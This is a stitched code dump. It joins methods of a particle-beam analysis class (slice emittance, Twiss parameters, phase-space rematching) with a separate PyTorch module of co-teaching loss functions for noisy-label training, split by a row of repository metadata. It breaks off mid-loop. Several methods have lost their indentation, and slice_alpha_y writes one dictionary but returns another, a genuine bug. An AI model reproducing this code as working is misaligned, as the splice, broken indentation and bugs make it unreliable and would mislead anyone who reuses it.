        if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
            self.bin_time()
        self.slice['Momentum_Spread'] = np.array([cpbin.std() if len(cpbin) > 0 else 0 for cpbin in self._cpbins])
        return self.slice['Momentum_Spread']
    @property
    def slice_relative_momentum_spread(self):
        # percentage momentum spread per time slice (0 for empty slices)
        if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
            self.bin_time()
        self.slice['Relative_Momentum_Spread'] = np.array([100*cpbin.std()/cpbin.mean() if len(cpbin) > 0 else 0 for cpbin in self._cpbins])
        return self.slice['Relative_Momentum_Spread']
def slice_data(self, data):
return [data[tuple(tbin)] for tbin in self._tfbins]
def emitbins(self, x, y):
xbins = self.slice_data(x)
ybins = self.slice_data(y)
return list(zip(*[xbins, ybins, self._cpbins]))
    @property
    def slice_6D_Volume(self):
        # 6D convex-hull volume of each time slice (same coordinates as
        # the whole-bunch 'volume' property)
        if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
            self.bin_time()
        xbins = self.slice_data(self.x)
        ybins = self.slice_data(self.y)
        zbins = self.slice_data(self.z-np.mean(self.z))
        pxbins = self.slice_data(self.cpx/self.cpz)
        pybins = self.slice_data(self.cpy/self.cpz)
        pzbins = self.slice_data(((self.cpz/np.mean(self.cp)) - 1))
        emitbins = list(zip(xbins, ybins, zbins, pxbins, pybins, pzbins))
        self.slice['6D_Volume'] = np.array([self.volume6D(*a) for a in emitbins])
        return self.slice['6D_Volume']
    @property
    def slice_density(self):
        # macro-particles per unit 6D phase-space volume, per time slice
        if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
            self.bin_time()
        xbins = self.slice_data(self.x)
        volume = self.slice_6D_Volume
        self.slice['Density'] = np.array([len(x)/v for x, v in zip(xbins, volume)])
        return self.slice['Density']
    @property
    def slice_horizontal_emittance(self):
        # geometric emittance per time slice (0 for empty slices)
        if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
            self.bin_time()
        emitbins = self.emitbins(self.x, self.xp)
        self.slice['Horizontal_Emittance'] = np.array([self.emittance(xbin, xpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins])
        return self.slice['Horizontal_Emittance']
    @property
    def slice_vertical_emittance(self):
        # geometric emittance per time slice (0 for empty slices)
        if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
            self.bin_time()
        emitbins = self.emitbins(self.y, self.yp)
        self.slice['Vertical_Emittance'] = np.array([self.emittance(ybin, ypbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins])
        return self.slice['Vertical_Emittance']
    @property
    def slice_normalized_horizontal_emittance(self):
        # momentum-normalised emittance per time slice
        if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
            self.bin_time()
        emitbins = self.emitbins(self.x, self.xp)
        self.slice['Normalized_Horizontal_Emittance'] = np.array([self.emittance(xbin, xpbin, cpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins])
        return self.slice['Normalized_Horizontal_Emittance']
    @property
    def slice_normalized_vertical_emittance(self):
        # momentum-normalised emittance per time slice
        if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
            self.bin_time()
        emitbins = self.emitbins(self.y, self.yp)
        self.slice['Normalized_Vertical_Emittance'] = np.array([self.emittance(ybin, ypbin, cpbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins])
        return self.slice['Normalized_Vertical_Emittance']
    @property
    def slice_normalized_mve_horizontal_emittance(self):
        # minimum-volume-ellipse emittance per time slice (momentum-normalised)
        if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
            self.bin_time()
        emitbins = self.emitbins(self.x, self.xp)
        self.slice['Normalized_mve_Horizontal_Emittance'] = np.array([self.mve_emittance(xbin, xpbin, cpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins])
        return self.slice['Normalized_mve_Horizontal_Emittance']
    @property
    def slice_normalized_mve_vertical_emittance(self):
        # minimum-volume-ellipse emittance per time slice (momentum-normalised)
        if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'):
            self.bin_time()
        emitbins = self.emitbins(self.y, self.yp)
        self.slice['Normalized_mve_Vertical_Emittance'] = np.array([self.mve_emittance(ybin, ypbin, cpbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins])
        return self.slice['Normalized_mve_Vertical_Emittance']
    @property
    def slice_peak_current(self):
        # per-slice current magnitude: (charge per particle) * (particles / slice duration)
        if not hasattr(self,'_hist'):
            self.bin_time()
        f = lambda bin: self.charge / len(self.t) * (len(bin) / (max(bin) - min(bin))) if len(bin) > 1 else 0
        # f = lambda bin: len(bin) if len(bin) > 1 else 0
        self.slice['Peak_Current'] = np.array([f(bin) for bin in self._tbins])
        return abs(self.slice['Peak_Current'])
@property
def slice_max_peak_current_slice(self):
peakI = self.slice_peak_current
self.slice['Max_Peak_Current_Slice'] = list(abs(peakI)).index(max(abs(peakI)))
return self.slice['Max_Peak_Current_Slice']
    @property
    def slice_beta_x(self):
        """Per-slice horizontal Twiss beta: <x*x>/emittance, 0 where the
        slice emittance is not positive.  Cached in self.slice."""
        xbins = self.slice_data(self.beam['x'])
        exbins = self.slice_horizontal_emittance
        emitbins = list(zip(xbins, exbins))
        self.slice['slice_beta_x'] = np.array([self.covariance(x, x)/ex if ex > 0 else 0 for x, ex in emitbins])
        return self.slice['slice_beta_x']
    @property
    def slice_alpha_x(self):
        """Per-slice horizontal Twiss alpha: -<x*x'>/emittance, 0 where the
        slice emittance is not positive.  Cached in self.slice."""
        xbins = self.slice_data(self.x)
        xpbins = self.slice_data(self.xp)
        exbins = self.slice_horizontal_emittance
        emitbins = list(zip(xbins, xpbins, exbins))
        self.slice['slice_alpha_x'] = np.array([-1*self.covariance(x, xp)/ex if ex > 0 else 0 for x, xp, ex in emitbins])
        return self.slice['slice_alpha_x']
    @property
    def slice_gamma_x(self):
        """Twiss gamma_x of the whole bunch.

        NOTE(review): despite the 'slice_' prefix this is NOT computed per
        slice — it uses the full-bunch covariance and caches the value in
        self.twiss rather than self.slice.  Confirm intent before relying
        on it in slice-level analysis.
        """
        self.twiss['gamma_x'] = self.covariance(self.xp,self.xp) / self.horizontal_emittance
        return self.twiss['gamma_x']
    @property
    def slice_beta_y(self):
        """Per-slice vertical Twiss beta: <y*y>/emittance, 0 where the
        slice emittance is not positive.  Cached in self.slice."""
        ybins = self.slice_data(self.beam['y'])
        eybins = self.slice_vertical_emittance
        emitbins = list(zip(ybins, eybins))
        self.slice['slice_beta_y'] = np.array([self.covariance(y, y)/ey if ey > 0 else 0 for y, ey in emitbins])
        return self.slice['slice_beta_y']
@property
def slice_alpha_y(self):
ybins = self.slice_data(self.y)
ypbins = self.slice_data(self.yp)
eybins = self.slice_vertical_emittance
emitbins = list(zip(ybins, ypbins, eybins))
self.slice['slice_alpha_y'] = np.array([-1*self.covariance(y,yp)/ey if ey > 0 else 0 for y, yp, ey in emitbins])
return self.twiss['slice_alpha_y']
    @property
    def slice_gamma_y(self):
        """Twiss gamma_y of the whole bunch.

        NOTE(review): not actually sliced — uses the full-bunch covariance
        and caches into self.twiss, not self.slice (same pattern as
        slice_gamma_x).  Confirm intent.
        """
        self.twiss['gamma_y'] = self.covariance(self.yp,self.yp) / self.vertical_emittance
        return self.twiss['gamma_y']
    def sliceAnalysis(self, density=False):
        """Recompute the slice dictionary and return key parameters at the
        peak-current slice.

        Returns (peak current, std of slice currents, relative momentum
        spread, normalised horizontal emittance, normalised vertical
        emittance, momentum, density), all evaluated at the peak slice.

        NOTE(review): the local 'slice_density' (gated on the 'density'
        flag) is computed but never used — the returned density is always
        self.slice_density[peakIPosition].  Confirm intended behaviour.
        """
        self.slice = {}
        self.bin_time()
        peakIPosition = self.slice_max_peak_current_slice
        slice_density = self.slice_density[peakIPosition] if density else 0
        return self.slice_peak_current[peakIPosition], \
               np.std(self.slice_peak_current), \
               self.slice_relative_momentum_spread[peakIPosition], \
               self.slice_normalized_horizontal_emittance[peakIPosition], \
               self.slice_normalized_vertical_emittance[peakIPosition], \
               self.slice_momentum[peakIPosition], \
               self.slice_density[peakIPosition],
    def mvesliceAnalysis(self):
        """Same as sliceAnalysis but using the mve_* emittance variants."""
        self.slice = {}
        self.bin_time()
        peakIPosition = self.slice_max_peak_current_slice
        return self.slice_peak_current[peakIPosition], \
               np.std(self.slice_peak_current), \
               self.slice_relative_momentum_spread[peakIPosition], \
               self.slice_normalized_mve_horizontal_emittance[peakIPosition], \
               self.slice_normalized_mve_vertical_emittance[peakIPosition], \
               self.slice_momentum[peakIPosition], \
               self.slice_density[peakIPosition],
    @property
    def chirp(self):
        """Longitudinal energy-chirp estimate over the bunch core.

        Collects the slices whose current is within 75% of the peak, then
        takes (last - first) slice momentum divided by the total length of
        those slices, scaled by 1e-18 (scaling kept from the original
        implementation; units unverified).
        """
        self.bin_time()
        slice_current_centroid_indices = []
        slice_momentum_centroid = []
        peakIPosition = self.slice_max_peak_current_slice
        peakI = self.slice_peak_current[peakIPosition]
        slicemomentum = self.slice_momentum
        for index, slice_current in enumerate(self.slice_peak_current):
            if abs(peakI - slice_current) < (peakI * 0.75):
                slice_current_centroid_indices.append(index)
        for index in slice_current_centroid_indices:
            slice_momentum_centroid.append(slicemomentum[index])
        chirp = (1e-18 * (slice_momentum_centroid[-1] - slice_momentum_centroid[0]) / (len(slice_momentum_centroid) * self.slice_length))
        return chirp
    @property
    def x(self):
        """Horizontal particle positions (beam['x'])."""
        return self.beam['x']
    @property
    def y(self):
        """Vertical particle positions (beam['y'])."""
        return self.beam['y']
    @property
    def z(self):
        """Longitudinal particle positions (beam['z'])."""
        return self.beam['z']
    @property
    def zn(self):
        """Longitudinal positions relative to the bunch mean."""
        return self.beam['z']-np.mean(self.beam['z'])
    @property
    def px(self):
        """Horizontal momentum components (beam['px'])."""
        return self.beam['px']
    @property
    def py(self):
        """Vertical momentum components (beam['py'])."""
        return self.beam['py']
    @property
    def pz(self):
        """Longitudinal momentum components (beam['pz'])."""
        return self.beam['pz']
    @property
    def cpx(self):
        """px divided by q_over_c."""
        return self.beam['px'] / self.q_over_c
    @property
    def cpy(self):
        """py divided by q_over_c."""
        return self.beam['py'] / self.q_over_c
    @property
    def cpz(self):
        """pz divided by q_over_c."""
        return self.beam['pz'] / self.q_over_c
    @property
    def xp(self):
        """Horizontal angles x' = arctan(px/pz)."""
        return np.arctan(self.px/self.pz)
    @property
    def yp(self):
        """Vertical angles y' = arctan(py/pz)."""
        return np.arctan(self.py/self.pz)
    @property
    def t(self):
        """Particle time coordinates (beam['t'])."""
        return self.beam['t']
    @property
    def p(self):
        """cp scaled back by q_over_c."""
        return self.cp * self.q_over_c
    @property
    def cp(self):
        """Magnitude sqrt(cpx^2 + cpy^2 + cpz^2)."""
        return np.sqrt(self.cpx**2 + self.cpy**2 + self.cpz**2)
    @property
    def Brho(self):
        """Mean momentum divided by the elementary charge (magnetic rigidity)."""
        return np.mean(self.p) / constants.elementary_charge
    @property
    def gamma(self):
        """Lorentz factor sqrt(1 + (cp/E0_eV)^2)."""
        return np.sqrt(1+(self.cp/self.E0_eV)**2)
    @property
    def BetaGamma(self):
        """Relativistic beta*gamma = cp / E0_eV."""
        return self.cp/self.E0_eV
    @property
    def vx(self):
        """Horizontal velocity px / (m_e * gamma)."""
        velocity_conversion = 1 / (constants.m_e * self.gamma)
        return velocity_conversion * self.px
    @property
    def vy(self):
        """Vertical velocity py / (m_e * gamma)."""
        velocity_conversion = 1 / (constants.m_e * self.gamma)
        return velocity_conversion * self.py
    @property
    def vz(self):
        """Longitudinal velocity pz / (m_e * gamma)."""
        velocity_conversion = 1 / (constants.m_e * self.gamma)
        return velocity_conversion * self.pz
    @property
    def Bx(self):
        """vx as a fraction of the speed of light."""
        return self.vx / constants.speed_of_light
    @property
    def By(self):
        """vy as a fraction of the speed of light."""
        return self.vy / constants.speed_of_light
    @property
    def Bz(self):
        """vz as a fraction of the speed of light."""
        return self.vz / constants.speed_of_light
    @property
    def charge(self):
        """Total bunch charge (beam['total_charge'])."""
        return self.beam['total_charge']
    @property
    def sigma_z(self):
        """RMS of Bz*c*(t - <t>), i.e. the longitudinal bunch size."""
        return self.rms(self.Bz*constants.speed_of_light*(self.beam['t'] - np.mean(self.beam['t'])))
    @property
    def momentum_spread(self):
        """Relative momentum spread std(cp)/mean(cp)."""
        return self.cp.std()/np.mean(self.cp)
    @property
    def linear_chirp_z(self):
        """Linear longitudinal chirp estimate (the /100 scaling is kept
        from the original implementation; units unverified)."""
        return -1*self.rms(self.Bz*constants.speed_of_light*self.t)/self.momentum_spread/100
def computeCorrelations(self, x, y):
xAve = np.mean(x)
yAve = np.mean(y)
C11 = 0
C12 = 0
C22 = 0
for i, ii in enumerate(x):
dx = x[i] - xAve
dy = y[i] - yAve
C11 += dx*dx
C12 += dx*dy
C22 += dy*dy
C11 /= len(x)
C12 /= len(x)
C22 /= len(x)
return C11, C12, C22
    @property
    def eta_x(self):
        """Horizontal dispersion (first element of calculate_etax())."""
        return self.calculate_etax()[0]
    @property
    def eta_xp(self):
        """Horizontal dispersion derivative (second element of calculate_etax())."""
        return self.calculate_etax()[1]
    def calculate_etax(self):
        """Return (eta_x, eta_x', mean t).

        eta = -<p> * S_x6 / S_66, with S the population covariances of the
        coordinate against total momentum cp; 0 when the momentum variance
        vanishes.  Note: the normalised momentum list 'p' computed here is
        not used by the correlations (they use self.cp directly).
        """
        p = self.cp
        pAve = np.mean(p)
        p = [a / pAve - 1 for a in p]
        S11, S16, S66 = self.computeCorrelations(self.x, self.cp)
        eta1 = -pAve * S16/S66 if S66 else 0
        S22, S26, S66 = self.computeCorrelations(self.xp, self.cp)
        etap1 = -pAve * S26/S66 if S66 else 0
        return eta1, etap1, np.mean(self.t)
    def performTransformation(self, x, xp, beta=False, alpha=False, nEmit=False):
        """Rematch the (x, xp) phase-space distribution to new Twiss values.

        Steps: (1) remove the dispersion correlation (computed from the
        full-bunch self.x/self.xp against cp); (2) measure the current
        beta/alpha/emittance of the cleaned distribution; (3) apply a 2x2
        linear transformation to reach the requested beta/alpha (defaults
        keep the measured values); (4) if nEmit is given, scale the matrix
        so that emit*pAve becomes nEmit.

        NOTE: mutates the passed-in sequences in place and also returns them.
        """
        p = self.cp
        pAve = np.mean(p)
        p = [a / pAve - 1 for a in p]
        # Dispersion and its derivative from correlations with momentum.
        S11, S16, S66 = self.computeCorrelations(self.x, self.cp)
        eta1 = S16/S66 if S66 else 0
        S22, S26, S66 = self.computeCorrelations(self.xp, self.cp)
        etap1 = S26/S66 if S66 else 0
        for i, ii in enumerate(x):
            x[i] -= p[i] * eta1
            xp[i] -= p[i] * etap1
        # Measured Twiss parameters of the dispersion-free distribution.
        S11, S12, S22 = self.computeCorrelations(x, xp)
        emit = np.sqrt(S11*S22 - S12**2)
        beta1 = S11/emit
        alpha1 = -S12/emit
        beta2 = beta if beta is not False else beta1
        alpha2 = alpha if alpha is not False else alpha1
        # 2x2 rematching matrix (R12 fixed at 0).
        R11 = beta2/np.sqrt(beta1*beta2)
        R12 = 0
        R21 = (alpha1-alpha2)/np.sqrt(beta1*beta2)
        R22 = beta1/np.sqrt(beta1*beta2)
        if nEmit is not False:
            # Uniform scaling so that emit*pAve -> nEmit after transformation.
            factor = np.sqrt(nEmit / (emit*pAve))
            R11 *= factor
            R12 *= factor
            R22 *= factor
            R21 *= factor
        for i, ii in enumerate(x):
            x0 = x[i]
            xp0 = xp[i]
            x[i] = R11 * x0 + R12 * xp0
            xp[i] = R21*x0 + R22*xp0
        return x, xp
    def rematchXPlane(self, beta=False, alpha=False, nEmit=False):
        """Rematch the horizontal plane in place, then rebuild the stored
        momenta (px, py, pz) so they stay consistent with the new angles."""
        x, xp = self.performTransformation(self.x, self.xp, beta, alpha, nEmit)
        self.beam['x'] = x
        self.beam['xp'] = xp
        # Redistribute the (unchanged) total momentum over the new angles.
        cpz = self.cp / np.sqrt(self.beam['xp']**2 + self.yp**2 + 1)
        cpx = self.beam['xp'] * cpz
        cpy = self.yp * cpz
        self.beam['px'] = cpx * self.q_over_c
        self.beam['py'] = cpy * self.q_over_c
        self.beam['pz'] = cpz * self.q_over_c
    def rematchYPlane(self, beta=False, alpha=False, nEmit=False):
        """Vertical-plane counterpart of rematchXPlane."""
        y, yp = self.performTransformation(self.y, self.yp, beta, alpha, nEmit)
        self.beam['y'] = y
        self.beam['yp'] = yp
        cpz = self.cp / np.sqrt(self.xp**2 + self.beam['yp']**2 + 1)
        cpx = self.xp * cpz
        cpy = self.beam['yp'] * cpz
        self.beam['px'] = cpx * self.q_over_c
        self.beam['py'] = cpy * self.q_over_c
        self.beam['pz'] = cpz * self.q_over_c
    def performTransformationPeakISlice(self, xslice, xpslice, x, xp, beta=False, alpha=False, nEmit=False):
        """Same as performTransformation, except the Twiss parameters
        (beta1, alpha1, emit) are measured on the supplied slice arrays
        (xslice, xpslice) while the transformation is applied to the full
        arrays x, xp.  Mutates x and xp in place and returns them.
        """
        p = self.cp
        pAve = np.mean(p)
        p = [a / pAve - 1 for a in p]
        # Dispersion removal uses the full-bunch correlations, as before.
        S11, S16, S66 = self.computeCorrelations(self.x, self.cp)
        eta1 = S16/S66 if S66 else 0
        S22, S26, S66 = self.computeCorrelations(self.xp, self.cp)
        etap1 = S26/S66 if S66 else 0
        for i, ii in enumerate(x):
            x[i] -= p[i] * eta1
            xp[i] -= p[i] * etap1
        # Twiss parameters measured on the peak-current slice only.
        S11, S12, S22 = self.computeCorrelations(xslice, xpslice)
        emit = np.sqrt(S11*S22 - S12**2)
        beta1 = S11/emit
        alpha1 = -S12/emit
        beta2 = beta if beta is not False else beta1
        alpha2 = alpha if alpha is not False else alpha1
        R11 = beta2/np.sqrt(beta1*beta2)
        R12 = 0
        R21 = (alpha1-alpha2)/np.sqrt(beta1*beta2)
        R22 = beta1/np.sqrt(beta1*beta2)
        if nEmit is not False:
            factor = np.sqrt(nEmit / (emit*pAve))
            R11 *= factor
            R12 *= factor
            R22 *= factor
            R21 *= factor
        for i, ii in enumerate(x):
            x0 = x[i]
            xp0 = xp[i]
            x[i] = R11 * x0 + R12 * xp0
            xp[i] = R21*x0 + R22*xp0
        return x, xp
    def rematchXPlanePeakISlice(self, beta=False, alpha=False, nEmit=False):
        """Rematch the horizontal plane using the Twiss parameters of the
        peak-current slice, then rebuild the stored momenta."""
        peakIPosition = self.slice_max_peak_current_slice
        xslice = self.slice_data(self.x)[peakIPosition]
        xpslice = self.slice_data(self.xp)[peakIPosition]
        x, xp = self.performTransformationPeakISlice(xslice, xpslice, self.x, self.xp, beta, alpha, nEmit)
        self.beam['x'] = x
        self.beam['xp'] = xp
        cpz = self.cp / np.sqrt(self.beam['xp']**2 + self.yp**2 + 1)
        cpx = self.beam['xp'] * cpz
        cpy = self.yp * cpz
        self.beam['px'] = cpx * self.q_over_c
        self.beam['py'] = cpy * self.q_over_c
        self.beam['pz'] = cpz * self.q_over_c
    def rematchYPlanePeakISlice(self, beta=False, alpha=False, nEmit=False):
        """Vertical-plane counterpart of rematchXPlanePeakISlice."""
        peakIPosition = self.slice_max_peak_current_slice
        yslice = self.slice_data(self.y)[peakIPosition]
        ypslice = self.slice_data(self.yp)[peakIPosition]
        y, yp = self.performTransformationPeakISlice(yslice, ypslice, self.y, self.yp, beta, alpha, nEmit)
        self.beam['y'] = y
        self.beam['yp'] = yp
        cpz = self.cp / np.sqrt(self.xp**2 + self.beam['yp']**2 + 1)
        cpx = self.xp * cpz
        cpy = self.beam['yp'] * cpz
        self.beam['px'] = cpx * self.q_over_c
        self.beam['py'] = cpy * self.q_over_c
        self.beam['pz'] = cpz * self.q_over_c
    @property
    def Sx(self):
        """RMS horizontal beam size sqrt(<x*x>)."""
        return np.sqrt(self.covariance(self.x,self.x))
    @property
    def Sy(self):
        """RMS vertical beam size sqrt(<y*y>)."""
        return np.sqrt(self.covariance(self.y,self.y))
| [
"james.jones@stfc.ac.uk"
] | james.jones@stfc.ac.uk |
a10a9de1404877e2b17e00db80964d50a2eb3f96 | 5228a88054a55caacda2cbd35de5c0a8d8181b8b | /loss_functions/coteaching_loss.py | bbed83d34cbcb3d486950c4ba1a9e4f4d6c164f3 | [
"MIT"
] | permissive | MPCAICDM/MPCA | 6703e542978134788de49dc2094a47534f8267c3 | c996435a0578ea4160f934bc01041c2ef23468f3 | refs/heads/main | 2023-06-03T19:05:02.055861 | 2021-06-12T09:14:44 | 2021-06-12T09:14:44 | 376,187,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,845 | py | import numpy as np
import torch
import torch.nn.functional as F
import torch.nn as nn
import random
class CoTeachingLoss(nn.Module):
    """Co-teaching loss for two reconstruction networks.

    Each branch is trained only on the fraction (1 - noise_rate) of the
    batch that its *peer* reconstructs best (lowest per-sample MSE), so
    presumed-noisy samples are excluded from both gradients.
    """
    def __init__(self, noise_rate=0.1):
        super(CoTeachingLoss, self).__init__()
        self.mse = nn.MSELoss(reduction='none')
        self.noise_rate = noise_rate

    def forward(self, xr1, xr2, x):
        """Return (loss_branch1, loss_branch2) for reconstructions of x."""
        # Per-sample reconstruction errors, averaged over C/H/W.
        err_1 = self.mse(xr1, x).mean(dim=(1, 2, 3))
        err_2 = self.mse(xr2, x).mean(dim=(1, 2, 3))
        # Rankings are detached: sample selection carries no gradient.
        rank_1 = err_1.argsort().detach()
        rank_2 = err_2.argsort().detach()
        keep = int(x.size(0) * (1. - self.noise_rate))
        # Cross-selection: each branch keeps the peer's easiest samples.
        loss_1 = err_1[rank_2[:keep]].mean()
        loss_2 = err_2[rank_1[:keep]].mean()
        return loss_1, loss_2
class CoTeachingResnetLoss(nn.Module):
    """Co-teaching cross-entropy loss for a pair of classifiers.

    Each network is trained on the (1 - noise_rate) fraction of samples
    that its peer classifies with the lowest cross-entropy.
    """
    def __init__(self, noise_rate=0.1, score_mode='pl_mean'):
        super(CoTeachingResnetLoss, self).__init__()
        self.noise_rate = noise_rate
        self.score_mode = score_mode  # scoring strategy used by predict()
        self.softmax = nn.Softmax(dim=1)
    def forward(self, o1, o2, labels):
        """Return (loss_net1, loss_net2) from the two logit tensors."""
        ce1 = F.cross_entropy(o1, labels, reduction='none')
        ce2 = F.cross_entropy(o2, labels, reduction='none')
        # Detached rankings: selection itself carries no gradient.
        idxsortd1 = ce1.argsort().detach()
        idxsortd2 = ce2.argsort().detach()
        rem_num = int(o1.size(0) * (1. - self.noise_rate))
        return ce1[idxsortd2[:rem_num]].mean(), \
            ce2[idxsortd1[:rem_num]].mean()
    def pl_mean(self, x, labels):
        # Not implemented in this variant; predict() raises when
        # score_mode == 'pl_mean'.
        raise NotImplementedError
    def neg_entropy(self, x):
        """Per-sample negative entropy of the softmax distribution."""
        ne = self.softmax(x)
        return (ne *torch.log2(ne)).sum(dim=1)
    def predict(self, x, labels):
        """Score samples with pl_mean (unimplemented) or negative entropy."""
        if self.score_mode == 'pl_mean':
            return self.pl_mean(x, labels)
        else:
            return self.neg_entropy(x)
class InCoTeachingEstLoss(nn.Module):
    """Reconstruction + autoregressive density loss with co-teaching
    style cross-selection between the two error signals.

    In 'exchange'/'neg' modes each term is averaged only over the samples
    that the *other* criterion ranks lowest; any other mode falls back to
    plain means.  forward() returns (loss, per-sample lmse, per-sample
    autoregressive error).
    """
    def __init__(self, lamd, cpd_channels, mode, noise_rate=0.1):
        super(InCoTeachingEstLoss, self).__init__()
        self.mse = nn.MSELoss(reduction='none')
        self.noise_rate = noise_rate
        self.lamd = lamd  # weight of the autoregressive term
        #self.lamd2 = 0.05
        self.coteach_mode = mode # 'exchange' 'union' 'intersect'
        self.cpd_channels = cpd_channels
        # Avoid nans
        self.eps = np.finfo(float).eps
    def L21_error(self, x, x_r):
        """Mean per-sample L2 reconstruction error (not called by forward())."""
        x = x.view(x.shape[0], -1)
        x_r = x_r.view(x_r.shape[0], -1)
        le = (torch.norm(x - x_r, p=2, dim=1)).mean()
        return le
    def Autoregress_error(self, z, z_dist):
        """Per-sample negative log-likelihood of the (detached) latent code
        z under the cpd_channels-bin distribution estimate z_dist."""
        z_d = z.detach()
        # Apply softmax
        z_dist = F.softmax(z_dist, dim=1)
        # Flatten out codes and distributions
        z_d = z_d.view(len(z_d), -1).contiguous()
        z_dist = z_dist.view(len(z_d), self.cpd_channels, -1).contiguous()
        # Log (regularized), pick the right ones
        z_dist = torch.clamp(z_dist, self.eps, 1 - self.eps)
        log_z_dist = torch.log(z_dist)
        index = torch.clamp(torch.unsqueeze(z_d, dim=1) * self.cpd_channels, min=0,
                            max=(self.cpd_channels - 1)).long()
        selected = torch.gather(log_z_dist, dim=1, index=index)
        selected = torch.squeeze(selected, dim=1)
        # Sum and mean
        S = torch.sum(selected, dim=-1)
        nll = -S
        return nll
    def forward(self, xr, x, z, z_dist):
        """Combine reconstruction and autoregressive errors per coteach_mode."""
        x = x.view(x.shape[0], -1)
        xr = xr.view(xr.shape[0], -1)
        lmse = torch.norm(x - xr, p=2, dim=1)
        idxsorted = lmse.argsort().detach().cpu().numpy()
        rem_num = int(x.size(0) * (1. - self.noise_rate))
        arg_err = self.Autoregress_error(z, z_dist)
        zidxsorted = arg_err.argsort().detach().cpu().numpy()
        if self.coteach_mode == 'exchange':
            # Each term averaged over the other criterion's easiest samples.
            a = lmse[zidxsorted[:rem_num]].mean()
            b = arg_err[idxsorted[:rem_num]].mean()
            #c = arg_err[idxsorted[rem_num:]].mean()
            loss = a + b * self.lamd
        elif self.coteach_mode == 'neg':
            # As 'exchange', but the hardest samples' NLL is subtracted.
            a = lmse[zidxsorted[:rem_num]].mean()
            b = arg_err[idxsorted[:rem_num]].mean()
            c = arg_err[idxsorted[rem_num:]].mean()
            loss = a + (b - c) * self.lamd
        else:
            loss = lmse.mean() + self.lamd * arg_err.mean()
        #print(a.item(), b.item())
        return loss, lmse, arg_err
class InCoTeachingHiddenLoss(nn.Module):
    """Multi-head reconstruction loss with a latent-norm regulariser.

    Every head's per-sample L2 error is averaged over the samples whose
    latent norm is smallest; the latent-norm term itself is averaged over
    the easiest samples of one randomly chosen head and weighted by lamd.
    """
    def __init__(self, lamd, noise_rate=0.1, group=2):
        super(InCoTeachingHiddenLoss, self).__init__()
        self.mse = nn.MSELoss(reduction='none')
        self.noise_rate = noise_rate
        self.group = group
        self.lamd = lamd
        self.lamd2 = 0.05  # NOTE(review): never used in this class
    def L21_error(self, x, x_r):
        """Mean per-sample L2 error (not called by forward())."""
        x = x.view(x.shape[0], -1)
        x_r = x_r.view(x_r.shape[0], -1)
        le = (torch.norm(x - x_r, p=2, dim=1)).mean()
        return le
    def forward(self, xr, x, z):
        """xr: iterable of per-head reconstructions; z: latent codes."""
        L_mse = []
        idxsorted = []
        x = x.view(x.shape[0], -1)
        #print(len(xr), xr[0].shape, x.shape, z.shape)
        for ixr in xr:
            ixr = ixr.view(ixr.shape[0], -1)
            #print(x.shape, ixr.shape)
            #lmse = self.mse(ixr, x).mean(dim=1)
            lmse = torch.norm(x - ixr, p=2, dim=1)
            #lmse = ixr.sub(x).pow(2).view(ixr.size(0), -1).sum(dim=1, keepdim=False)
            L_mse.append(lmse)
            idxsorted.append(lmse.argsort().detach().cpu().numpy())
        rem_num = int(x.size(0) * (1. - self.noise_rate))
        znorm = torch.norm(z, p=2, dim=1)
        zidxsorted = znorm.argsort().detach().cpu().numpy()
        shift = random.randint(0, self.group - 1)  # randomly chosen head
        loss = 0
        #print(rem_num)
        for i in range(self.group):
            # Each head trains on the samples with the smallest latent norm.
            loss += L_mse[i][zidxsorted[:rem_num]].mean()
            #loss += L_mse[i].mean()
        return znorm[idxsorted[(shift)%self.group][:rem_num]].mean() * self.lamd + loss
        #return znorm.mean()+loss
class InCoTeachingAgreeLoss(nn.Module):
    """Agreement variant: train every head only on samples all heads agree
    are easy (low reconstruction error).

    NOTE(review): np.intersect1d is taken against the FULL index array
    idxsorted[i] rather than its first rem_idx entries, so the
    intersection removes nothing and 'agrees' stays equal to
    idxsorted[0][:rem_idx].  idxsorted[i][:rem_idx] was probably intended;
    confirm before changing behaviour.
    """
    def __init__(self, noise_rate=0.1, group=2):
        super(InCoTeachingAgreeLoss, self).__init__()
        self.mse = nn.MSELoss(reduction='none')
        self.noise_rate = noise_rate
        self.group = group
    def forward(self, xr, x):
        """xr: iterable of per-head reconstructions of x."""
        L_mse = []
        idxsorted = []
        for ixr in xr:
            lmse = self.mse(ixr, x).mean(dim=(1,2,3))
            L_mse.append(lmse)
            idxsorted.append(lmse.argsort().detach().cpu().numpy())
        rem_idx = int(x.size(0) * (1. - self.noise_rate))
        loss = 0
        agrees = idxsorted[0][:rem_idx]
        for i in range(1, self.group):
            agrees = np.intersect1d(agrees,idxsorted[i])
        for i in range(self.group):
            loss += L_mse[i][agrees].mean()
            #loss += L_mse[i].mean()
        return loss
class InCoTeachingLoss(nn.Module):
    """Internal co-teaching across `group` reconstruction heads.

    Each head is trained on the (1 - noise_rate) fraction of samples that
    a cyclically shifted peer head (random non-zero shift per call)
    reconstructs with the lowest per-sample MSE.
    """
    def __init__(self, noise_rate=0.1, group=2):
        super(InCoTeachingLoss, self).__init__()
        self.mse = nn.MSELoss(reduction='none')
        self.noise_rate = noise_rate
        self.group = group

    def forward(self, xr, x):
        """xr: iterable of per-head reconstructions of x; returns a scalar."""
        # Per-head, per-sample errors plus detached easy-to-hard rankings.
        per_head = [self.mse(rec, x).mean(dim=(1, 2, 3)) for rec in xr]
        rankings = [errs.argsort().detach() for errs in per_head]
        keep = int(x.size(0) * (1. - self.noise_rate))
        offset = random.randint(1, self.group - 1)  # never pair a head with itself
        total = 0
        for head, errs in enumerate(per_head):
            peer = rankings[(head + offset) % self.group]
